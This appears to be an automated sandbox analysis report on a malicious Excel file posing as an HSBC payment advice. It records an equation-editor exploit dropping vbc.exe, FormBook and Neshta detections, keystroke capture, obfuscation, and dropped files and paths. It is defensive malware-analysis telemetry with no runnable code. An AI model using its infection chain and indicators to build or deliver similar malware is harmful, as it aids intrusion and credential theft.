Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a raw input device (often for capturing keystrokes)
Source: vbc.exe, 00000005.00000003.502748576.00000000009A0000.00000004.00000001.sdmp Binary or memory string: _WinAPI_RegisterRawInputDevices.au3

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Yara signature match
Source: 5.0.vbc.exe.400000.15.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.17.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.19.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.13.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.19.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.17.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.15.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.469402863.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.466923037.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.468925310.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.467300347.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.468071854.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.468443002.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.467692423.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe, type: DROPPED Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, reference = Internal Research, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354
Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe, type: DROPPED Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, reference = Internal Research, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354
Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe, type: DROPPED Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, reference = Internal Research, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354
Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe, type: DROPPED Matched rule: SUSP_Unsigned_GoogleUpdate date = 2019-08-05, author = Florian Roth, description = Detects suspicious unsigned GoogleUpdate.exe, reference = Internal Research, score = 5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354
Creates files inside the system directory
Source: C:\Users\Public\vbc.exe File created: C:\Windows\svchost.com Jump to behavior
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_012FA2A9 4_2_012FA2A9
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E1E38 4_2_001E1E38
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E72C2 4_2_001E72C2
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E55D0 4_2_001E55D0
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E17B0 4_2_001E17B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_012FA035 4_2_012FA035
Source: C:\Users\Public\vbc.exe Code function: 5_2_012FA2A9 5_2_012FA2A9
Source: C:\Users\Public\vbc.exe Code function: 5_2_012FA035 5_2_012FA035
Unable to load, office file is protected or invalid
Source: C:\Users\Public\vbc.exe Window title found: unsupported 16-bit application okthe program or feature "\??\c:\users\user\appdata\local\temp\3582-490\vbc.exe" cannot start or run due to incompatibity with 64-bit versions of windows. please contact the software vendor to ask if a 64-bit windows compatible version is available.
PE file does not import any functions
Source: Aut2exe.exe.5.dr Static PE information: No import functions for PE file found
Source: chrome_pwa_launcher.exe.5.dr Static PE information: No import functions for PE file found
Source: setup.exe0.5.dr Static PE information: No import functions for PE file found
Source: AcroTextExtractor.exe.5.dr Static PE information: No import functions for PE file found
Source: vcredist_x64.exe.5.dr Static PE information: No import functions for PE file found
Source: VC_redist.x86.exe.5.dr Static PE information: No import functions for PE file found
Source: Eula.exe.5.dr Static PE information: No import functions for PE file found
Source: setup.exe.5.dr Static PE information: No import functions for PE file found
Source: jucheck.exe.5.dr Static PE information: No import functions for PE file found
Source: Au3Info_x64.exe.5.dr Static PE information: No import functions for PE file found
Source: Aut2exe_x64.exe.5.dr Static PE information: No import functions for PE file found
Source: Au3Check.exe.5.dr Static PE information: No import functions for PE file found
Source: 32BitMAPIBroker.exe.5.dr Static PE information: No import functions for PE file found
Source: vcredist_x86.exe.5.dr Static PE information: No import functions for PE file found
Source: RdrCEF.exe.5.dr Static PE information: No import functions for PE file found
Source: chrmstp.exe.5.dr Static PE information: No import functions for PE file found
Source: armsvc.exe.5.dr Static PE information: No import functions for PE file found
Source: LogTransport2.exe.5.dr Static PE information: No import functions for PE file found
Source: AutoIt3Help.exe.5.dr Static PE information: No import functions for PE file found
Source: Uninstall.exe.5.dr Static PE information: No import functions for PE file found
Source: jusched.exe.5.dr Static PE information: No import functions for PE file found
Source: FullTrustNotifier.exe.5.dr Static PE information: No import functions for PE file found
Source: AdobeCollabSync.exe.5.dr Static PE information: No import functions for PE file found
Source: reader_sl.exe.5.dr Static PE information: No import functions for PE file found
Source: wow_helper.exe.5.dr Static PE information: No import functions for PE file found
Source: SciTE.exe.5.dr Static PE information: No import functions for PE file found
Source: ADelRCP.exe.5.dr Static PE information: No import functions for PE file found
Source: jaureg.exe.5.dr Static PE information: No import functions for PE file found
Source: AdobeARM.exe.5.dr Static PE information: No import functions for PE file found
Source: ose.exe.5.dr Static PE information: No import functions for PE file found
Source: Au3Info.exe.5.dr Static PE information: No import functions for PE file found
Source: AcroBroker.exe.5.dr Static PE information: No import functions for PE file found
Source: Wkconv.exe.5.dr Static PE information: No import functions for PE file found
Source: 64BitMAPIBroker.exe.5.dr Static PE information: No import functions for PE file found
Source: upx.exe.5.dr Static PE information: No import functions for PE file found
Source: AutoIt3_x64.exe.5.dr Static PE information: No import functions for PE file found
Source: AdobeARMHelper.exe.5.dr Static PE information: No import functions for PE file found
Source: elevation_service.exe.5.dr Static PE information: No import functions for PE file found
Source: vcredist_x86.exe0.5.dr Static PE information: No import functions for PE file found
Source: VC_redist.x64.exe.5.dr Static PE information: No import functions for PE file found
Source: dwtrig20.exe.5.dr Static PE information: No import functions for PE file found
Source: WCChromeNativeMessagingHost.exe.5.dr Static PE information: No import functions for PE file found
Source: vcredist_x64.exe0.5.dr Static PE information: No import functions for PE file found
Source: AcroRd32.exe.5.dr Static PE information: No import functions for PE file found
Source: VSTOInstaller.exe.5.dr Static PE information: No import functions for PE file found
Source: arh.exe.5.dr Static PE information: No import functions for PE file found
PE file overlay found
Source: AcroTextExtractor.exe.5.dr Static PE information: Data appended to the last section found
Source: vcredist_x64.exe.5.dr Static PE information: Data appended to the last section found
Source: Eula.exe.5.dr Static PE information: Data appended to the last section found
Source: Au3Info_x64.exe.5.dr Static PE information: Data appended to the last section found
Source: Au3Check.exe.5.dr Static PE information: Data appended to the last section found
Source: 32BitMAPIBroker.exe.5.dr Static PE information: Data appended to the last section found
Source: vcredist_x86.exe.5.dr Static PE information: Data appended to the last section found
Source: armsvc.exe.5.dr Static PE information: Data appended to the last section found
Source: LogTransport2.exe.5.dr Static PE information: Data appended to the last section found
Source: AutoIt3Help.exe.5.dr Static PE information: Data appended to the last section found
Source: Uninstall.exe.5.dr Static PE information: Data appended to the last section found
Source: jusched.exe.5.dr Static PE information: Data appended to the last section found
Source: FullTrustNotifier.exe.5.dr Static PE information: Data appended to the last section found
Source: reader_sl.exe.5.dr Static PE information: Data appended to the last section found
Source: wow_helper.exe.5.dr Static PE information: Data appended to the last section found
Source: ADelRCP.exe.5.dr Static PE information: Data appended to the last section found
Source: jaureg.exe.5.dr Static PE information: Data appended to the last section found
Source: ose.exe.5.dr Static PE information: Data appended to the last section found
Source: Au3Info.exe.5.dr Static PE information: Data appended to the last section found
Source: AcroBroker.exe.5.dr Static PE information: Data appended to the last section found
Source: 64BitMAPIBroker.exe.5.dr Static PE information: Data appended to the last section found
Source: upx.exe.5.dr Static PE information: Data appended to the last section found
Source: AdobeARMHelper.exe.5.dr Static PE information: Data appended to the last section found
Source: vcredist_x86.exe0.5.dr Static PE information: Data appended to the last section found
Source: dwtrig20.exe.5.dr Static PE information: Data appended to the last section found
Source: WCChromeNativeMessagingHost.exe.5.dr Static PE information: Data appended to the last section found
Source: vcredist_x64.exe0.5.dr Static PE information: Data appended to the last section found
Source: VSTOInstaller.exe.5.dr Static PE information: Data appended to the last section found
Source: arh.exe.5.dr Static PE information: Data appended to the last section found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: vbc[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: VC_redist.x64.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: VC_redist.x86.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Aut2exe.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Aut2exe_x64.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: upx.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: VC_redist.x64.exe.5.dr Static PE information: Section: .rsrc ZLIB complexity 1.00537109375
Source: VC_redist.x64.exe.5.dr Static PE information: Section: .reloc ZLIB complexity 1.021484375
Source: VC_redist.x86.exe.5.dr Static PE information: Section: .rsrc ZLIB complexity 1.00537109375
Source: VC_redist.x86.exe.5.dr Static PE information: Section: .reloc ZLIB complexity 1.021484375
Source: Aut2exe.exe.5.dr Static PE information: Section: .rsrc ZLIB complexity 1.00537109375
Source: Aut2exe.exe.5.dr Static PE information: Section: .reloc ZLIB complexity 1.021484375
Source: Aut2exe_x64.exe.5.dr Static PE information: Section: .rsrc ZLIB complexity 1.00537109375
Source: Aut2exe_x64.exe.5.dr Static PE information: Section: .reloc ZLIB complexity 1.021484375
Source: Payment Advice HSBC.xlsx Virustotal: Detection: 34%
Source: Payment Advice HSBC.xlsx ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Payment Advice HSBC.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE10B.tmp Jump to behavior
Source: classification engine Classification label: mal100.spre.troj.expl.evad.winXLSX@7/103@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\mmsBFhjVBcbveI
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: vbc[1].exe.2.dr, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.2.dr, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.vbc.exe.12f0000.1.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.12f0000.0.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E1298 push esp; retn 0013h 4_2_001E1321
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E8F9C push eax; ret 4_2_001E8F9D
Source: C:\Users\Public\vbc.exe Code function: 5_2_004080C0 push 004080E6h; ret 5_2_004080DE
